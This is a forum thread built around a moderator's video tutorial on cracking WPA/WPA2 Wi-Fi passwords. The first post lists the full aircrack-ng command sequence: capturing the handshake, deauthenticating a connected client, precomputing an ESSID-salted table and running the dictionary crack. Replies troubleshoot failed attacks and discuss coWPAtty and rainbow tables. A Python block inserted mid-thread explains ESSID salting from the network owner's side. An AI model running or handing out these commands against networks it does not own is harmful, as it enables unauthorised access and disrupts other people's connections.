Thread: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    [Video] Cracking WiFi - WPA/WPA2 with Hidden SSID (aircrack-ng + airolib-ng)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/2318855/
    Download video: http://www.mediafire.com/?kn0b37v79rptd9e


    What is this?
    How to crack a wireless network using WPA/WPA2 (PSK/AES) encryption with a connected client (as both have the same method!). Then using a pre-computed hash table, which has been "pre-salted" with the ESSID for the network, to get the pass-phrase.


    How does this work?
    > Captures a 4-way handshake
    > Creates a quick DoS (Denial of Service) attack at the connected client to force them to disconnect and reconnect
    > Apply a brute force dictionary attack to the handshake


    What do I need?

    > aircrack-ng suite
    > WiFi Card that supports monitor mode
    > Big dictionary
    > Processing power


    Software
    Name: Aircrack-ng
    Version: 1.0-rc3
    Home Page: http://www.aircrack-ng.org/doku.php
    Download Link: http://download.aircrack-ng.org/airc...1.0-rc3.tar.gz


    Commands:

    Code:
    airmon-ng start wlan0
    
    airodump-ng mon0
    airodump-ng --bssid 00:1B:9E:B2:60:00 -c 1 -w output mon0
    
    aireplay-ng --deauth 10 -a 00:1B:9E:B2:60:00 -c 00:12:17:94:90:0D mon0
    
    airolib-ng crackwpa --import passwd /root/tools/dictionaries/g0tmi1k.lst
    kate ~/essid
    airolib-ng crackwpa --import essid ~/essid
    airolib-ng crackwpa --stats
    airolib-ng crackwpa --clean all
    airolib-ng crackwpa --batch
    airolib-ng crackwpa --verify all
    
    aircrack-ng -r crackwpa output*.cap



    Notes:

    This is cut from my final video called "g0tmi1k's home network".
    There HAS to be a CONNECTED client.
    The pass-phrase HAS to be in the dictionary - so if you use something like http://grc.com/pass, the chances of it being cracked are next to nothing!

    Song: Sub Focus - Rock It
    Video length: 03:53
    Capture length: 04:03

    Blog Post: http://g0tmi1k.blogspot.com/2009/07/...k-wpawpa2.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1656-%5Bvideo%5D-how-crack-wpa-wpa2-aircrack-ng-airolib-ng.html
    Dictionaries: http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html
    Last edited by g0tmi1k; 03-05-2011 at 04:31 PM.
    Have you...g0tmi1k?

  2. #2
    Member m0j4h3d's Avatar
    Join Date
    Jan 2010
    Posts
    84

    Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)

    Thanks for the post... but same problem... need a big dictionary... but it could be solved with good luck
    ---> 3v3RY D4y P4ss3S 1 f0uNd N3W th1NGs <---
    Knowing how 2 use BT dsnt mean that u r hacker

  3. #3
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    16

    Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)

    m0j4h3d... try John the Ripper and crunch for that... but it can take a long... long... time

    c

  4. #4
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)

    Quote Originally Posted by m0j4h3d
    Thanks for the post... but same problem... need a big dictionary... but it could be solved with good luck

    Dictionaries: http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html
    Have you...g0tmi1k?

  5. #5
    Good friend of the forums gunrunr's Avatar
    Join Date
    Jan 2010
    Location
    shining my spoon
    Posts
    265

    Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)

    What about using genpmk and the ESSID to pre-compute your hash files, and then cracking with coWPAtty? Right now I'm actually torrenting the Shmoo top 1000 ESSIDs rainbow tables to assist me in cracking, which is probably the best thing about having a laptop that's specifically being used for running BT4. I'm already filling up my 250 GB drive with hashes and dictionaries far beyond those that are in the repos.
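
Why the hash table in the first post has to be "pre-salted" with the ESSID, and why ready-made tables exist only for common ESSIDs, shown from the network owner's side. This is an added example, not code from the thread or from aircrack-ng; `audit`, `estimated_bits`, the sample SSIDs and the sample wordlist are constructed for illustration.

```python
import hashlib
import math
import string

def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK master key: PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds, 32 bytes."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8-63 characters")
    salt = ssid.encode("utf-8")
    if not 1 <= len(salt) <= 32:
        raise ValueError("SSID must be 1-32 bytes")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), salt, 4096, 32)

def estimated_bits(passphrase: str) -> float:
    """Upper bound on entropy, assuming every character was chosen at random
    from the character classes present (a rough assumption, not a measurement)."""
    pool = 0
    for cls in (string.ascii_lowercase, string.ascii_uppercase, string.digits):
        if any(c in cls for c in passphrase):
            pool += len(cls)
    if any(c not in string.ascii_letters + string.digits for c in passphrase):
        pool += 33  # printable ASCII punctuation plus space
    return len(passphrase) * math.log2(pool) if pool else 0.0

def audit(ssid, passphrase, common_ssids, wordlist):
    """Review your own network's settings against precomputation and dictionaries."""
    return {
        # A precomputed table is only usable against the exact SSID it was built for.
        "ssid_has_ready_made_tables": ssid in common_ssids,
        # A dictionary attack can only succeed if the passphrase is in the list.
        "passphrase_in_wordlist": passphrase in wordlist,
        "estimated_bits": round(estimated_bits(passphrase), 1),
    }

# Constructed sample data, not taken from any real list.
COMMON_SSIDS = {"linksys", "default", "NETGEAR"}
WORDLIST = {"password", "12345678", "letmein123"}

if __name__ == "__main__":
    # Same passphrase, two SSIDs: the derived keys are unrelated.
    print(wpa_pmk("password", "linksys").hex())
    print(wpa_pmk("password", "home-7f3a-annex").hex())
    print(audit("linksys", "password", COMMON_SSIDS, WORDLIST))
    print(audit("home-7f3a-annex", "q7#Lm2!vRz9@tKe4", COMMON_SSIDS, WORDLIST))
```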

  6. #6
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)

    Quote Originally Posted by gunrunr
    What about using genpmk and the ESSID to pre-compute your hash files, and then cracking with coWPAtty? Right now I'm actually torrenting the Shmoo top 1000 ESSIDs rainbow tables to assist me in cracking, which is probably the best thing about having a laptop that's specifically being used for running BT4. I'm already filling up my 250 GB drive with hashes and dictionaries far beyond those that are in the repos.

    Hello,
    I did a video on my blog of Aircrack-ng vs coWPAtty, comparing the speeds & time it takes to crack, and I've now posted it here for you:
    http://www.backtrack-linux.org/forum....html#post8094
    and yes, I've also got a torrent on the go, seeding a few hashes & dictionaries myself!
    Have you...g0tmi1k?

  7. #7
    Just burned his ISO
    Join Date
    May 2010
    Posts
    1

    Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)

    Thanks,
    Nice share, I haven't seen such a great explanation elsewhere.

    But I am facing some problems!!! Can you please HELP ME??

    I have successfully executed the commands:
    airmon-ng start wlan0

    airodump-ng mon0
    airodump-ng --bssid 00:1B:9E:B2:60:00 -c 1 -w output mon0
    But the command "aireplay-ng --deauth 10 -a 00:1B:9E:B2:60:00 -c 00:12:17:94:90:0D mon0"
    is NOT working properly, as shown in the figure:

    http://img210.imageshack.us/img210/4444/77296826.jpg

    Can you tell me what the problem is there?
    Also, please help me to solve this problem!!!!!

    Thank you!!! Waiting!!!


    MOD EDIT: Removed Huge Picture. Left Link in place.
    Last edited by Archangel-Amael; 05-19-2010 at 05:07 PM. Reason: See Above

  8. #8
    Just burned his ISO
    Join Date
    Jun 2010
    Posts
    2

    Re: [Video] Cracking WiFi - WPA/WPA2 with Hidden SSID (aircrack-ng + airolib-ng)

    I did something wrong, didn't find key

    root@bt:~# aircrack-ng -r crackwpa output*.cap
    Opening output-01.cap
    Opening output-02.cap
    Read 220329 packets.

    # BSSID ESSID Encryption

    1 BSSID SHOWN HERE Batman Strikes WPA (1 handshake)

    Choosing first network as target.

    Opening output-01.cap
    Opening output-02.cap
    Reading packets, please wait...

    Aircrack-ng 1.0 r164
    Quitting aircrack-ng...

  9. #9
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Re: [Video] Cracking WiFi - WPA/WPA2 with Hidden SSID (aircrack-ng + airolib-ng)

    Quote Originally Posted by Desert
    Thanks for the great tutorial.
    But I have one question!!
    What is the meaning of "Big dictionary"?
    Because it didn't work for me when I reached this command:

    aireplay-ng --deauth 1 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0

    Nothing happens and a new command line appears.
    Thank you again

    The dictionary has no effect on that command. You need a big dictionary, because the chance of it having the pass-phrase is increased.
    Are you sure they are the correct MAC addresses (and the right way around)?
    If it doesn't work - try to manually disconnect and reconnect - see if you can get the handshake that way.


    Quote Originally Posted by btrack4
    Please help me.
    I use a USB to boot BackTrack. I have a dictionary.txt on the USB but I don't know how to access this file when I crack (aircrack-ng -w...???). Thanks!
    Excuse my English!

    Mount it?
    I'm guessing you're going to need konqueror...


    Quote Originally Posted by longjidin
    Nice tutorial g0tm1lk, keep up the good work.....!!

    Thanks for the thanks!


    Quote Originally Posted by gibbsfan19
    I did something wrong, didn't find key

    root@bt:~# aircrack-ng -r crackwpa output*.cap
    Opening output-01.cap
    Opening output-02.cap
    Read 220329 packets.

    # BSSID ESSID Encryption

    1 BSSID SHOWN HERE Batman Strikes WPA (1 handshake)

    Choosing first network as target.

    Opening output-01.cap
    Opening output-02.cap
    Reading packets, please wait...

    Aircrack-ng 1.0 r164
    Quitting aircrack-ng...

    I think the problem is the pass-phrase isn't in the dictionary. Open the dictionary (either kate or cat/grep) and check that it is in there.
    Have you...g0tmi1k?

  10. #10
    Junior Member
    Join Date
    Aug 2010
    Posts
    48

    Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)

    I had a bad experience when using coWPAtty. After throwing the key into the middle of a list, and following the commands set out for me, the key was not found. Although, it did go through the PMKs extremely fast. Luckily I use a beefed up laptop.
